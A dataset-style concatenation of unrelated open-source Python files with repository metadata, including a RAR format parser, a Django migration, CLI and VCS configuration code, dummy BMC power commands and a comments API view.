(r'^(?P<a>(x|y))/b/(?P<c>\w+)ab', '/<a>/b/<c>ab'),
(r'^(?P<a>(x|y)(\(|\)))/b/(?P<c>\w+)ab', '/<a>/b/<c>ab'),
(r'^a/?$', '/a/'),
)
for pattern, output in tests:
self.assertEqual(simplify_regex(pattern), output)
|
auready/django
|
tests/admin_docs/test_views.py
|
Python
|
bsd-3-clause
| 14,791 | 0.003042 |
"""
RAR parser
Status: can only read higher-level structures
Author: Christophe Gisquet
"""
from hachoir_parser import Parser
from hachoir_core.field import (StaticFieldSet, FieldSet,
Bit, Bits, Enum,
UInt8, UInt16, UInt32, UInt64,
String, TimeDateMSDOS32,
NullBytes, NullBits, RawBytes)
from hachoir_core.text_handler import textHandler, filesizeHandler, hexadecimal
from hachoir_core.endian import LITTLE_ENDIAN
from hachoir_parser.common.msdos import MSDOSFileAttr32
from datetime import timedelta
MAX_FILESIZE = 1000 * 1024 * 1024
BLOCK_NAME = {
0x72: "Marker",
0x73: "Archive",
0x74: "File",
0x75: "Comment",
0x76: "Extra info",
0x77: "Subblock",
0x78: "Recovery record",
0x79: "Archive authenticity",
0x7A: "New-format subblock",
0x7B: "Archive end",
}
COMPRESSION_NAME = {
0x30: "Storing",
0x31: "Fastest compression",
0x32: "Fast compression",
0x33: "Normal compression",
0x34: "Good compression",
0x35: "Best compression"
}
OS_MSDOS = 0
OS_WIN32 = 2
OS_NAME = {
0: "MS DOS",
1: "OS/2",
2: "Win32",
3: "Unix",
}
DICTIONARY_SIZE = {
0: "Dictionary size 64 Kb",
1: "Dictionary size 128 Kb",
2: "Dictionary size 256 Kb",
3: "Dictionary size 512 Kb",
4: "Dictionary size 1024 Kb",
7: "File is a directory",
}
def formatRARVersion(field):
"""
Decodes the RAR version stored on 1 byte
"""
return "%u.%u" % divmod(field.value, 10)
def markerFlags(s):
yield UInt16(s, "flags", "Marker flags, always 0x1a21")
commonFlags = (
(Bit, "is_ignorable", "Old versions of RAR should ignore this block when copying data"),
(Bit, "has_added_size", "Additional field indicating additional size"),
)
class ArchiveFlags(StaticFieldSet):
format = (
(Bit, "vol", "Archive volume"),
(Bit, "has_comment", "Whether there is a comment"),
        (Bit, "is_locked", "Archive is locked"),
(Bit, "is_solid", "Whether files can be extracted separately"),
(Bit, "new_numbering", "New numbering, or compressed comment"), # From unrar
(Bit, "has_authenticity_information", "The integrity/authenticity of the archive can be checked"),
        (Bit, "is_protected", "Whether a recovery record is present"),
(Bit, "is_passworded", "Needs a password to be decrypted"),
(Bit, "is_first_vol", "Whether it is the first volume"),
(Bit, "is_encrypted", "Whether the encryption version is present"),
(NullBits, "internal", 4, "Reserved for 'internal use'"),
) + commonFlags
def archiveFlags(s):
yield ArchiveFlags(s, "flags", "Archiver block flags")
def archiveHeader(s):
yield NullBytes(s, "reserved[]", 2, "Reserved word")
yield NullBytes(s, "reserved[]", 4, "Reserved dword")
def commentHeader(s):
yield filesizeHandler(UInt16(s, "total_size", "Comment header size + comment size"))
yield filesizeHandler(UInt16(s, "uncompressed_size", "Uncompressed comment size"))
yield UInt8(s, "required_version", "RAR version needed to extract comment")
yield UInt8(s, "packing_method", "Comment packing method")
yield UInt16(s, "comment_crc16", "Comment CRC")
def commentBody(s):
size = s["total_size"].value - s.current_size
if size > 0:
yield RawBytes(s, "comment_data", size, "Compressed comment data")
def signatureHeader(s):
yield TimeDateMSDOS32(s, "creation_time")
yield filesizeHandler(UInt16(s, "arc_name_size"))
yield filesizeHandler(UInt16(s, "user_name_size"))
def recoveryHeader(s):
yield filesizeHandler(UInt32(s, "total_size"))
yield textHandler(UInt8(s, "version"), hexadecimal)
yield UInt16(s, "rec_sectors")
yield UInt32(s, "total_blocks")
yield RawBytes(s, "mark", 8)
def avInfoHeader(s):
yield filesizeHandler(UInt16(s, "total_size", "Total block size"))
yield UInt8(s, "version", "Version needed to decompress", handler=hexadecimal)
yield UInt8(s, "method", "Compression method", handler=hexadecimal)
yield UInt8(s, "av_version", "Version for AV", handler=hexadecimal)
yield UInt32(s, "av_crc", "AV info CRC32", handler=hexadecimal)
def avInfoBody(s):
size = s["total_size"].value - s.current_size
if size > 0:
yield RawBytes(s, "av_info_data", size, "AV info")
class FileFlags(FieldSet):
static_size = 16
def createFields(self):
yield Bit(self, "continued_from", "File continued from previous volume")
yield Bit(self, "continued_in", "File continued in next volume")
yield Bit(self, "is_encrypted", "File encrypted with password")
yield Bit(self, "has_comment", "File comment present")
yield Bit(self, "is_solid", "Information from previous files is used (solid flag)")
        # The following three fields are what prevent this FieldSet from being fully static
yield Enum(Bits(self, "dictionary_size", 3, "Dictionary size"), DICTIONARY_SIZE)
yield Bit(self, "is_large", "file64 operations needed")
yield Bit(self, "is_unicode", "Filename also encoded using Unicode")
yield Bit(self, "has_salt", "Has salt for encryption")
yield Bit(self, "uses_file_version", "File versioning is used")
yield Bit(self, "has_ext_time", "Extra time info present")
yield Bit(self, "has_ext_flags", "Extra flag ??")
for field in commonFlags:
yield field[0](self, *field[1:])
def fileFlags(s):
yield FileFlags(s, "flags", "File block flags")
class ExtTimeFlags(FieldSet):
static_size = 16
def createFields(self):
for name in ['arctime', 'atime', 'ctime', 'mtime']:
yield Bits(self, "%s_count" % name, 2, "Number of %s bytes" % name)
yield Bit(self, "%s_onesec" % name, "Add one second to the timestamp?")
yield Bit(self, "%s_present" % name, "Is %s extra time present?" % name)
class ExtTime(FieldSet):
def createFields(self):
yield ExtTimeFlags(self, "time_flags")
for name in ['mtime', 'ctime', 'atime', 'arctime']:
if self['time_flags/%s_present' % name].value:
if name != 'mtime':
yield TimeDateMSDOS32(self, "%s" % name, "%s DOS timestamp" % name)
count = self['time_flags/%s_count' % name].value
if count:
yield Bits(self, "%s_remainder" % name, 8 * count, "%s extra precision time (in 100ns increments)" % name)
def createDescription(self):
out = 'Time extension'
pieces = []
for name in ['mtime', 'ctime', 'atime', 'arctime']:
if not self['time_flags/%s_present' % name].value:
continue
if name == 'mtime':
basetime = self['../ftime'].value
else:
basetime = self['%s' % name].value
delta = timedelta()
if self['time_flags/%s_onesec' % name].value:
delta += timedelta(seconds=1)
if '%s_remainder'%name in self:
delta += timedelta(microseconds=self['%s_remainder' % name].value / 10.0)
pieces.append('%s=%s' % (name, basetime + delta))
if pieces:
out += ': ' + ', '.join(pieces)
return out
def specialHeader(s, is_file):
yield filesizeHandler(UInt32(s, "compressed_size", "Compressed size (bytes)"))
yield filesizeHandler(UInt32(s, "uncompressed_size", "Uncompressed size (bytes)"))
yield Enum(UInt8(s, "host_os", "Operating system used for archiving"), OS_NAME)
yield textHandler(UInt32(s, "crc32", "File CRC32"), hexadecimal)
yield TimeDateMSDOS32(s, "ftime", "Date and time (MS DOS format)")
yield textHandler(UInt8(s, "version", "RAR version needed to extract file"), formatRARVersion)
yield Enum(UInt8(s, "method", "Packing method"), COMPRESSION_NAME)
yield filesizeHandler(UInt16(s, "filename_length", "File name size"))
if s["host_os"].value in (OS_MSDOS, OS_WIN32):
yield MSDOSFileAttr32(s, "file_attr", "File attributes")
else:
yield textHandler(UInt32(s, "file_attr", "File attributes"), hexadecimal)
# Start additional field from unrar
if s["flags/is_large"].value:
yield filesizeHandler(UInt64(s, "large_size", "Extended 64bits filesize"))
# End additional field
size = s["filename_length"].value
if size > 0:
if s["flags/is_unicode"].value:
charset = "UTF-8"
else:
charset = "ISO-8859-15"
yield String(s, "filename", size, "Filename", charset=charset)
# Start additional fields from unrar - file only
if is_file:
if s["flags/has_salt"].value:
yield RawBytes(s, "salt", 8, "Encryption salt to increase security")
if s["flags/has_ext_time"].value:
yield ExtTime(s, "extra_time")
def fileHeader(s):
return specialHeader(s, True)
def fileBody(s):
# File compressed data
size = s["compressed_size"].value
if s["flags/is_large"].value:
size += s["large_size"].value
if size > 0:
yield RawBytes(s, "compressed_data", size, "File compressed data")
def fileDescription(tag):
def _fileDescription(s):
return "%s: %s (%s)" % \
(tag, s["filename"].display, s["compressed_size"].display)
return _fileDescription
def newSubHeader(s):
return specialHeader(s, False)
class EndFlags(StaticFieldSet):
format = (
        (Bit, "has_next_vol", "Whether another volume follows"),
(Bit, "has_data_crc", "Whether a CRC value is present"),
(Bit, "rev_space"),
(Bit, "has_vol_number", "Whether the volume number is present"),
(NullBits, "unused[]", 10),
) + commonFlags
def endFlags(s):
yield EndFlags(s, "flags", "End block flags")
class BlockFlags(StaticFieldSet):
static_size = 16
format = (
(NullBits, "unused[]", 14),
) + commonFlags
class Block(FieldSet):
BLOCK_INFO = {
# None means 'use default function'
0x72: ("marker", "File format marker", markerFlags, None, None),
0x73: ("archive_start", "Archive info", archiveFlags, archiveHeader, None),
0x74: ("file[]", fileDescription("File entry"), fileFlags, fileHeader, fileBody),
0x75: ("comment[]", "Comment", None, commentHeader, commentBody),
0x76: ("av_info[]", "Extra information", None, avInfoHeader, avInfoBody),
0x77: ("sub_block[]", fileDescription("Subblock"), None, newSubHeader, fileBody),
0x78: ("recovery[]", "Recovery block", None, recoveryHeader, None),
0x79: ("signature", "Signature block", None, signatureHeader, None),
0x7A: ("sub_block[]", fileDescription("New-format subblock"), fileFlags,
newSubHeader, fileBody),
0x7B: ("archive_end", "Archive end block", endFlags, None, None),
}
def __init__(self, parent, name):
FieldSet.__init__(self, parent, name)
t = self["block_type"].value
if t in self.BLOCK_INFO:
self._name, desc, parseFlags, parseHeader, parseBody = self.BLOCK_INFO[t]
if callable(desc):
self.createDescription = lambda: desc(self)
elif desc:
self._description = desc
if parseFlags : self.parseFlags = lambda: parseFlags(self)
if parseHeader : self.parseHeader = lambda: parseHeader(self)
if parseBody : self.parseBody = lambda: parseBody(self)
else:
            self.info("Processing as unknown block of type %u" % t)
self._size = 8*self["block_size"].value
if t == 0x74 or t == 0x7A:
self._size += 8*self["compressed_size"].value
if "is_large" in self["flags"] and self["flags/is_large"].value:
self._size += 8*self["large_size"].value
elif "has_added_size" in self:
self._size += 8*self["added_size"].value
# TODO: check if any other member is needed here
def createFields(self):
yield textHandler(UInt16(self, "crc16", "Block CRC16"), hexadecimal)
yield textHandler(UInt8(self, "block_type", "Block type"), hexadecimal)
# Parse flags
for field in self.parseFlags():
yield field
# Get block size
yield filesizeHandler(UInt16(self, "block_size", "Block size"))
# Parse remaining header
for field in self.parseHeader():
yield field
        # Finish header with stuff of unknown size
size = self["block_size"].value - (self.current_size//8)
if size > 0:
            yield RawBytes(self, "unknown", size, "Unknown data (UInt32 probably)")
# Parse body
for field in self.parseBody():
yield field
def createDescription(self):
        return "Block entry: %s" % self["block_type"].display
def parseFlags(self):
yield BlockFlags(self, "flags", "Block header flags")
def parseHeader(self):
if "has_added_size" in self["flags"] and \
self["flags/has_added_size"].value:
yield filesizeHandler(UInt32(self, "added_size",
"Supplementary block size"))
def parseBody(self):
"""
Parse what is left of the block
"""
size = self["block_size"].value - (self.current_size//8)
if "has_added_size" in self["flags"] and self["flags/has_added_size"].value:
size += self["added_size"].value
if size > 0:
yield RawBytes(self, "body", size, "Body data")
class RarFile(Parser):
MAGIC = "Rar!\x1A\x07\x00"
PARSER_TAGS = {
"id": "rar",
"category": "archive",
"file_ext": ("rar",),
"mime": (u"application/x-rar-compressed", ),
"min_size": 7*8,
"magic": ((MAGIC, 0),),
"description": "Roshal archive (RAR)",
}
endian = LITTLE_ENDIAN
def validate(self):
magic = self.MAGIC
if self.stream.readBytes(0, len(magic)) != magic:
return "Invalid magic"
return True
def createFields(self):
while not self.eof:
yield Block(self, "block[]")
def createContentSize(self):
start = 0
end = MAX_FILESIZE * 8
pos = self.stream.searchBytes("\xC4\x3D\x7B\x00\x40\x07\x00", start, end)
if pos is not None:
return pos + 7*8
return None
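# Minimal usage sketch (hachoir 1.x / Python 2 API; the filename is a
# placeholder). createParser() selects RarFile through the magic and
# PARSER_TAGS declared above:
#
#     from hachoir_parser import createParser
#     parser = createParser(u"archive.rar")
#     for block in parser:
#         print block.name, block.description
#
# Each iteration yields one Block; file entries expose fields such as
# "filename" and "compressed_size" produced by specialHeader().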
|
kreatorkodi/repository.torrentbr
|
plugin.video.yatp/site-packages/hachoir_parser/archive/rar.py
|
Python
|
gpl-2.0
| 14,384 | 0.005284 |
# -*- coding:utf-8 -*-
import copy
from zope.interface import implementer
from .interfaces import (
IExecutor,
ISchemaValidation,
IDataValidation,
ICreate,
IDelete,
IEdit
)
from alchemyjsonschema.dictify import (
normalize,
validate_all,
ErrorFound
)
from jsonschema import FormatChecker
from jsonschema.validators import Draft4Validator
class ValidationError(Exception):
pass
@implementer(IExecutor)
class Executor(object):
def __init__(self, context, params):
self.context = context
self.raw_params = params
self.params = None
    def validation(self, ob=None):
        raise NotImplementedError
    def execute(self, ob=None):
        raise NotImplementedError
def default_validation(self, iface, ob=None, name=""):
fn = self.context.customized_or_default(iface, ISchemaValidation, name=name)
params = fn(self.context, self.raw_params)
fn2 = self.context.customized_or_default(iface, IDataValidation, name=name)
fn2(self.context, params, ob)
return params
class CreateExecutor(Executor):
def validation(self, ob=None):
        self.params = self.default_validation(ICreate, ob)
def execute(self, ob=None):
if self.params is None:
raise RuntimeError("execute after validation")
ob = self.context.modelclass(**self.params)
self.context.session.add(ob)
self.context.session.flush()
return ob
class EditExecutor(Executor):
def validation(self, ob=None):
        self.params = self.default_validation(IEdit, ob)
def execute(self, ob):
if self.params is None:
raise RuntimeError("execute after validation")
for k, v in self.params.items():
setattr(ob, k, v)
self.context.session.add(ob)
return ob
class DeleteExecutor(Executor):
def validation(self, ob=None):
        self.params = self.default_validation(IDelete, ob)
def execute(self, ob):
self.context.session.delete(ob)
return ob
def create_jsonschema_validation(context, params, ob=None):
def customize_schema(schema):
schema = copy.deepcopy(schema)
# when creating model, id is not needed.
if "id" in schema["required"]:
schema["required"].remove("id")
if "id" in schema["properties"]:
schema["properties"].pop("id")
return schema
schema = customize_schema(context.schema)
schema_validator = Draft4Validator(schema, format_checker=FormatChecker())
try:
validate_all(params, schema_validator)
except ErrorFound as err:
raise ValidationError({e.path[0]: e.message for e in err.errors})
return normalize(params, schema)
def edit_jsonschema_validation(context, params):
schema = context.schema
schema_validator = Draft4Validator(schema, format_checker=FormatChecker())
try:
validate_all(params, schema_validator)
except ErrorFound as err:
raise ValidationError({e.path[0]: e.message for e in err.errors})
return normalize(params, schema)
def delete_jsonschema_validation(context, params):
return params
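# Illustrative flow sketch (the context object and its attributes are
# assumptions inferred from the accesses above, not a documented API):
#
#     executor = CreateExecutor(context, {"name": "foo"})
#     executor.validation()      # ISchemaValidation then IDataValidation
#     ob = executor.execute()    # RuntimeError if called before validation()
#
# The None check on self.params is what enforces the two-phase
# validate-then-execute contract.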
|
podhmo/komet
|
komet/executors.py
|
Python
|
mit
| 3,149 | 0.000318 |
# -*- coding: utf-8 -*-
# Copyright © 2014-2016 Digital Catapult and The Copyright Hub Foundation
# (together the Open Permissions Platform Coalition)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""API Roles handler. Allows roles to be created and modified.
"""
from koi import auth
from perch import Token, User
from tornado.gen import coroutine
from .base import BaseHandler
class RolesHandler(BaseHandler):
"""Responsible for managing role resources
"""
@auth.auth_required(Token.valid)
@coroutine
def get(self):
"""Get all roles"""
roles = {x.value for x in User.roles}
result = [{'id': x, 'name': x.title()} for x in roles]
self.finish({
'status': 200,
'data': result
})
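# Illustrative response shape for GET /roles (the role values come from the
# perch User.roles enum, so the entries below are placeholders):
#
#     {"status": 200,
#      "data": [{"id": "administrator", "name": "Administrator"}, ...]}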
|
openpermissions/accounts-srv
|
accounts/controllers/roles_handler.py
|
Python
|
gpl-3.0
| 1,354 | 0 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-07-05 10:03
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('account', '0003_auto_20170705_0958'),
]
operations = [
migrations.RenameField(
model_name='oauthtoken',
old_name='renew_token',
new_name='refresh_token',
),
migrations.RenameField(
model_name='oauthtoken',
old_name='renew_token_expiration',
new_name='refresh_token_expiration',
),
]
|
BdEINSALyon/resa
|
account/migrations/0004_auto_20170705_1003.py
|
Python
|
gpl-3.0
| 620 | 0 |
import logging
import sys
from cliff.app import App
from cliff.commandmanager import CommandManager
# from .utils import ColorLogFormatter
from nicelog.formatters import ColorLineFormatter
class HarvesterApp(App):
logger = logging.getLogger(__name__)
def __init__(self):
super(HarvesterApp, self).__init__(
description='Harvester application CLI',
version='0.1',
command_manager=CommandManager('harvester.commands'))
def configure_logging(self):
"""
Create logging handlers for any log output.
Modified version to set custom formatter for console
"""
root_logger = logging.getLogger('')
root_logger.setLevel(logging.DEBUG)
# Set up logging to a file
if self.options.log_file:
file_handler = logging.FileHandler(
filename=self.options.log_file,
)
formatter = logging.Formatter(self.LOG_FILE_MESSAGE_FORMAT)
file_handler.setFormatter(formatter)
root_logger.addHandler(file_handler)
# Always send higher-level messages to the console via stderr
console = logging.StreamHandler(self.stderr)
console_level = {0: logging.WARNING,
1: logging.INFO,
2: logging.DEBUG,
}.get(self.options.verbose_level, logging.DEBUG)
console.setLevel(console_level)
# formatter = logging.Formatter(self.CONSOLE_MESSAGE_FORMAT)
formatter = ColorLineFormatter(
show_date=True, show_function=True, show_filename=True)
console.setFormatter(formatter)
root_logger.addHandler(console)
return
def main(argv=sys.argv[1:]):
myapp = HarvesterApp()
return myapp.run(argv)
if __name__ == '__main__':
sys.exit(main())
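# Invocation sketch: cliff resolves subcommands from the 'harvester.commands'
# entry-point group, so with the package installed the CLI can be driven
# programmatically (the argument list below is illustrative):
#
#     main(['--help'])
#
# Passing -v/-vv on the command line raises the console log level mapped in
# configure_logging().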
|
opendatatrentino/opendata-harvester
|
harvester/cli.py
|
Python
|
bsd-2-clause
| 1,858 | 0 |
# -*- coding: utf-8 -*- vim:fileencoding=utf-8:
# vim: tabstop=4:shiftwidth=4:softtabstop=4:expandtab
# Copyright © 2010-2012 Greek Research and Technology Network (GRNET S.A.)
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH REGARD
# TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT,
# OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF
# USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
# TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
'''
Module containing dummy implementations of django management commands
Idea is to be able to use it for unit tests and as a reference
'''
def power_on(hostname, username, password, **kwargs):
'''
Power on command
'''
return True
def power_off(hostname, username, password, **kwargs):
'''
Power off command
'''
return True
def power_off_acpi(hostname, username, password, **kwargs):
'''
Power off using ACPI command
'''
return True
def power_cycle(hostname, username, password, **kwargs):
'''
Cold boot command
'''
return True
def power_reset(hostname, username, password, **kwargs):
'''
Warm boot command
'''
return True
def pass_change(hostname, username, password, **kwargs):
'''
Change BMC password
'''
return True
def set_settings(hostname, username, password, **kwargs):
'''
Set BMC settings
'''
return True
def set_ldap_settings(hostname, username, password, **kwargs):
'''
Set BMC LDAP settings
'''
return True
def boot_order(hostname, username, password, **kwargs):
'''
Set boot order
'''
return True
def license_set(hostname, username, password, **kwargs):
'''
Set BMC License
'''
return True
def bmc_reset(hostname, username, password, **kwargs):
'''
Reset BMC
'''
return True
def bmc_factory_defaults(hostname, username, password, **kwargs):
'''
Reset BMC to factory defaults
'''
return True
def add_user(hostname, username, password, **kwargs):
'''
Add a user to the BMC
'''
return True
def remove_user(hostname, username, password, **kwargs):
'''
Remove a User from the BMC
'''
return True
def get_all_users(hostname, username, password, **kwargs):
'''
Get a list of all configured users on the BMC
'''
return True
def firmware_update(hostname, username, password, **kwargs):
'''
Performs a firmware update of the BMC
'''
return True
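if __name__ == '__main__':
    # Smoke-test sketch: every dummy command shares the
    # (hostname, username, password, **kwargs) signature and returns True.
    # The credentials are placeholders, not a real BMC.
    for command in (power_on, power_off, power_cycle, bmc_reset):
        assert command('bmc.example.com', 'admin', 'secret')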
|
apoikos/servermon
|
hwdoc/vendor/dummy.py
|
Python
|
isc
| 2,909 | 0.005846 |
hiddenimports = ['decimal']
|
ryandoherty/RaceCapture_App
|
install/hooks/hook-autosportlabs.racecapture.views.configuration.rcp.scriptview.py
|
Python
|
gpl-3.0
| 28 | 0 |
#Problem 1:
#Python provides a built-in function called len that returns the length of a string
#so the value of len('allen') is 5.
#Write a function named right_justify that takes a string named s as a parameter and prints
#the string with enough leading spaces so that the last letter of the string is in column 70
#of the display.
#word = raw_input('Type a word to send over there ---->\n')
def right_justify(word):
print " " * (70 - len(word)) + word
#right_justify(word)
#Problem 2:
#1. Type this example into a script and test it:
#def do_twice(f):
#f()
#f()
#2. Modify do_twice so that it takes two arguments, a function object and a value,
#and calls the function twice, passing the value as an argument.
#3. Write a more general version of print_spam, called print_twice, that takes a
#string as a parameter and prints it twice.
#4. Use the modified version of do_twice to call print_twice twice, passing 'spam'
#as an argument.
#5. Define a new function called do_four that takes a function object and a value
#and calls the function four times, passing the value as a parameter. There should
#be only two statements in the body of this function, not four.
word = raw_input('Type a word to repeat\n')
string = raw_input('Type something here\n')
def do_twice(f, value):
    f(value)
    f(value)
def print_spam(word):
    print word
def print_twice(s):
    print s
    print s
def do_four(f, value):
    do_twice(f, value)
    do_twice(f, value)
do_twice(print_twice, string)
do_four(print_twice, 'spam')
print ''
|
hollylemos/think-python
|
chapter-03/3.py
|
Python
|
mit
| 1,541 | 0.035042 |
import pytest
from punch import vcs_configuration as vc
@pytest.fixture
def global_variables():
return {
'serializer': '{{ major }}.{{ minor }}.{{ patch }}',
'mark': 'just a mark'
}
@pytest.fixture
def vcs_config_dict():
return {
'name': 'git',
'commit_message': "Version updated to {{ new_version }}",
'finish_release': True,
'options': {
'make_release_branch': False,
'annotate_tags': False,
'annotation_message': '',
}
}
@pytest.fixture
def vcs_config_dict_with_include_files(vcs_config_dict):
vcs_config_dict['include_files'] = ['HISTORY.rst']
return vcs_config_dict
@pytest.fixture
def vcs_config_dict_with_include_all_files(vcs_config_dict):
vcs_config_dict['include_all_files'] = True
return vcs_config_dict
@pytest.fixture
def special_variables():
return {
'current_version': '1.2.3',
'new_version': '1.3.0'
}
def test_vcs_configuration_from_string(
vcs_config_dict, global_variables, special_variables):
vcsconf = vc.VCSConfiguration(vcs_config_dict['name'],
vcs_config_dict['options'],
global_variables,
special_variables,
vcs_config_dict['commit_message']
)
expected_options = {
'make_release_branch': False,
'annotate_tags': False,
'annotation_message': '',
'current_version': '1.2.3',
'new_version': '1.3.0'
}
assert vcsconf.name == 'git'
assert vcsconf.commit_message == "Version updated to 1.3.0"
assert vcsconf.include_files == []
assert vcsconf.finish_release is True
assert vcsconf.options == expected_options
def test_vcs_configuration_from_string_with_include_files(
vcs_config_dict_with_include_files,
global_variables, special_variables):
vcsconf = vc.VCSConfiguration(
vcs_config_dict_with_include_files['name'],
vcs_config_dict_with_include_files['options'],
global_variables,
special_variables,
vcs_config_dict_with_include_files['commit_message'],
include_files=vcs_config_dict_with_include_files['include_files']
)
assert vcsconf.include_files == ['HISTORY.rst']
def test_vcs_configuration_from_string_with_include_all_files(
vcs_config_dict_with_include_all_files,
global_variables, special_variables):
vcsconf = vc.VCSConfiguration(
vcs_config_dict_with_include_all_files['name'],
vcs_config_dict_with_include_all_files['options'],
global_variables,
special_variables,
vcs_config_dict_with_include_all_files['commit_message'],
include_all_files=vcs_config_dict_with_include_all_files[
'include_all_files']
)
assert vcsconf.include_all_files is True
def test_vcs_configuration_from_dict(
vcs_config_dict, global_variables, special_variables):
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
expected_options = {
'make_release_branch': False,
'annotate_tags': False,
'annotation_message': '',
'current_version': '1.2.3',
'new_version': '1.3.0'
}
assert vcsconf.name == 'git'
assert vcsconf.commit_message == "Version updated to 1.3.0"
assert vcsconf.include_files == []
assert vcsconf.finish_release is True
assert vcsconf.options == expected_options
def test_vcs_configuration_from_dict_with_include_files(
vcs_config_dict_with_include_files,
global_variables, special_variables):
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict_with_include_files,
global_variables,
special_variables
)
assert vcsconf.include_files == ['HISTORY.rst']
def test_vcs_configuration_from_dict_with_include_all_files(
vcs_config_dict_with_include_all_files,
global_variables, special_variables):
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict_with_include_all_files,
global_variables,
special_variables
)
assert vcsconf.include_all_files is True
def test_vcs_configuration_from_dict_without_commit_message(
vcs_config_dict, global_variables, special_variables):
vcs_config_dict.pop('commit_message')
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
expected_options = {
'make_release_branch': False,
'annotate_tags': False,
'annotation_message': '',
'current_version': '1.2.3',
'new_version': '1.3.0'
}
assert vcsconf.name == 'git'
assert vcsconf.commit_message == "Version updated 1.2.3 -> 1.3.0"
assert vcsconf.include_files == []
assert vcsconf.finish_release is True
assert vcsconf.options == expected_options
def test_vcs_configuration_from_dict_without_finish_release(
vcs_config_dict, global_variables, special_variables):
vcs_config_dict.pop('finish_release')
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
expected_options = {
'make_release_branch': False,
'annotate_tags': False,
'annotation_message': '',
'current_version': '1.2.3',
'new_version': '1.3.0'
}
assert vcsconf.name == 'git'
assert vcsconf.commit_message == "Version updated to 1.3.0"
assert vcsconf.include_files == []
assert vcsconf.finish_release is True
assert vcsconf.options == expected_options
def test_vcs_configuration_from_dict_without_options(
vcs_config_dict, global_variables, special_variables):
vcs_config_dict.pop('options')
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
assert vcsconf.name == 'git'
assert vcsconf.commit_message == "Version updated to 1.3.0"
assert vcsconf.finish_release is True
def test_vcs_configuration_from_dict_can_use_global_variables(
vcs_config_dict, global_variables, special_variables):
vcs_config_dict['commit_message'] = "Mark: {{ mark }}"
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
assert vcsconf.commit_message == "Mark: just a mark"
def test_vcs_configuration_from_dict_special_variables_take_precedence(
vcs_config_dict, global_variables, special_variables):
vcs_config_dict['commit_message'] = "{{ current_version }}"
global_variables['current_version'] = "5.0.0"
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
assert vcsconf.commit_message == "1.2.3"
def test_vcs_configuration_from_dict_options_templates_are_processed(
vcs_config_dict, global_variables, special_variables):
vcs_config_dict['options']['annotation_message'] = \
"Updated {{ current_version}} -> {{ new_version }}"
vcsconf = vc.VCSConfiguration.from_dict(
vcs_config_dict,
global_variables,
special_variables
)
expected_options = {
'make_release_branch': False,
'annotate_tags': False,
'annotation_message': 'Updated 1.2.3 -> 1.3.0',
'current_version': '1.2.3',
'new_version': '1.3.0'
}
assert vcsconf.options == expected_options
|
lgiordani/punch
|
tests/test_vcs_configuration.py
|
Python
|
isc
| 7,655 | 0 |
from django.conf.urls.defaults import patterns # noqa
from django.conf.urls.defaults import url # noqa
from openstack_dashboard.dashboards.fogbow.usage import views
from openstack_dashboard.dashboards.fogbow.usage.views import IndexView
urlpatterns = patterns('',
url(r'^$', IndexView.as_view(), name='index'),
url(r'^(?P<member_id>.*)/usage$', views.getSpecificMemberUsage, name='usage'),
)
|
fogbow/fogbow-dashboard
|
openstack_dashboard/dashboards/fogbow/usage/urls.py
|
Python
|
apache-2.0
| 404 | 0.00495 |
from rest_framework import generics, permissions as drf_permissions
from rest_framework.exceptions import NotFound, ValidationError, PermissionDenied
from modularodm import Q
from modularodm.exceptions import NoResultsFound
from api.base.exceptions import Gone
from api.base import permissions as base_permissions
from api.base.views import JSONAPIBaseView
from api.comments.permissions import (
CommentDetailPermissions,
CommentReportsPermissions
)
from api.comments.serializers import (
CommentSerializer,
CommentDetailSerializer,
CommentReportSerializer,
CommentReportDetailSerializer,
CommentReport
)
from framework.auth.core import Auth
from framework.auth.oauth_scopes import CoreScopes
from framework.exceptions import PermissionsError
from website.project.model import Comment
class CommentMixin(object):
"""Mixin with convenience methods for retrieving the current comment based on the
current URL. By default, fetches the comment based on the comment_id kwarg.
"""
serializer_class = CommentSerializer
comment_lookup_url_kwarg = 'comment_id'
def get_comment(self, check_permissions=True):
pk = self.kwargs[self.comment_lookup_url_kwarg]
try:
comment = Comment.find_one(Q('_id', 'eq', pk) & Q('root_target', 'ne', None))
except NoResultsFound:
raise NotFound
# Deleted root targets still appear as tuples in the database and are included in
# the above query, requiring an additional check
if comment.root_target.referent.is_deleted:
comment.root_target = None
comment.save()
if comment.root_target is None:
raise NotFound
if check_permissions:
# May raise a permission denied
self.check_object_permissions(self.request, comment)
return comment
class CommentDetail(JSONAPIBaseView, generics.RetrieveUpdateDestroyAPIView, CommentMixin):
"""Details about a specific comment. *Writeable*.
###Permissions
Comments on public nodes are given read-only access to everyone. Comments on private nodes are only visible
to contributors and administrators on the parent node. Only the user who created the comment has permission
to edit and delete the comment.
